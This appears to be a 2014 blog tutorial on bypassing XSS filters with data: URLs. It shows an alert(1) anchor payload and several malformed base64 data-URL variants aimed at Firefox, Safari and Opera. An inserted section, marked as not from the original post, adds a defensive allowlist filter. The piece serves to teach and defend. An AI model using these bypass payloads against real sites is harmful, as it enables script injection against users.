Sunday, 22 June 2014



Hello Friends,

After a long time I'm writing a blog post again, but believe me, it's really fun, and I'm going to take you very, very deep if you really understand what I describe below.

Let's start. Basically, data URLs in their Base64-encoded form can be used for XSS filter bypass, and it gets serious when working with Firefox & Opera. There, newly opened documents retain access to the opening page (loading completely). So an attacker can easily trigger XSS on these semi-loaded tags.

<a target=_blank href="data:text/html,");alert(1)//">Click Me</a>

We can even Base64-encode this payload. But Google Chrome will block the attacker's trick, so he has limited options in his pocket.



Fun Starts Now


Now, what if a specific XSS filter knows about data: URLs and tries to filter/reject the payload? We can still bypass it, of course!

I found an interesting way to bypass it, and you might like it.

data:text/html;base64UrduSecurity,[Attack-Payload] - Firefox & Safari
data:text/html:;base64,[Attack-Payload]
data:text/html:[A-Lot-of-White-Spaces];base64,[Attack-Payload]
data:text/html;base64,,[Attack-Payload] - Opera

And here is the fully designed payload, ready!

data:text,html;<before>base64<after>,[base64content]

This table might help you someday.
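From the defender's side, the variants listed above show why a filter that matches the exact `data:text/html;base64,` syntax is not enough, and why the decision should be made on the URL scheme alone. The following is an added example, not code from the original post; the function names, the allowed-scheme set and the `PAYLOAD` placeholder are assumptions.

```javascript
// Assumption: only these schemes are acceptable in user-supplied links.
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Blacklist of the kind the post defeats: it only knows the canonical syntax.
function naiveFilterBlocks(href) {
  return /^data:text\/html;base64,/i.test(href);
}

// Allowlist check: decide on the scheme only, never on the media type or the
// ";base64" token, so a malformed middle part cannot change the verdict.
function isSafeHref(href) {
  // Browsers drop tab/LF/CR and surrounding control characters or spaces
  // before parsing a URL, so normalise the same way before inspecting it.
  const cleaned = String(href)
    .replace(/[\t\n\r]/g, "")
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  if (m) return ALLOWED_SCHEMES.has(m[1].toLowerCase());
  // No well-formed scheme: accept only a plain relative reference, i.e. no
  // ':' before the first '/', '?' or '#'.
  const head = cleaned.split(/[\/?#]/)[0];
  return !head.includes(":");
}

// Constructed inputs: the post's variants, with PAYLOAD as an inert placeholder.
const PAGE_VARIANTS = [
  "data:text/html;base64,PAYLOAD", // canonical form
  "data:text/html;base64UrduSecurity,PAYLOAD",
  "data:text/html:;base64,PAYLOAD",
  "data:text/html:      ;base64,PAYLOAD",
  "data:text/html;base64,,PAYLOAD",
];

// Run both filters over a list of hrefs and report what each one rejects.
function compare(hrefs) {
  return hrefs.map((href) => ({
    href,
    naiveBlocks: naiveFilterBlocks(href),
    allowlistBlocks: !isSafeHref(href),
  }));
}

console.table(compare(PAGE_VARIANTS));
```

The allowlist rejects every variant because each one still begins with the `data:` scheme, whatever is done to the part after it.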




Hope you guys like this tutorial. Leave your feedback; in case of any queries, let me know.

Playing with DATA URL Tags in HTML

    Copyright © HACK | Designed by Muhammad Adeel | Founder UrduSecurity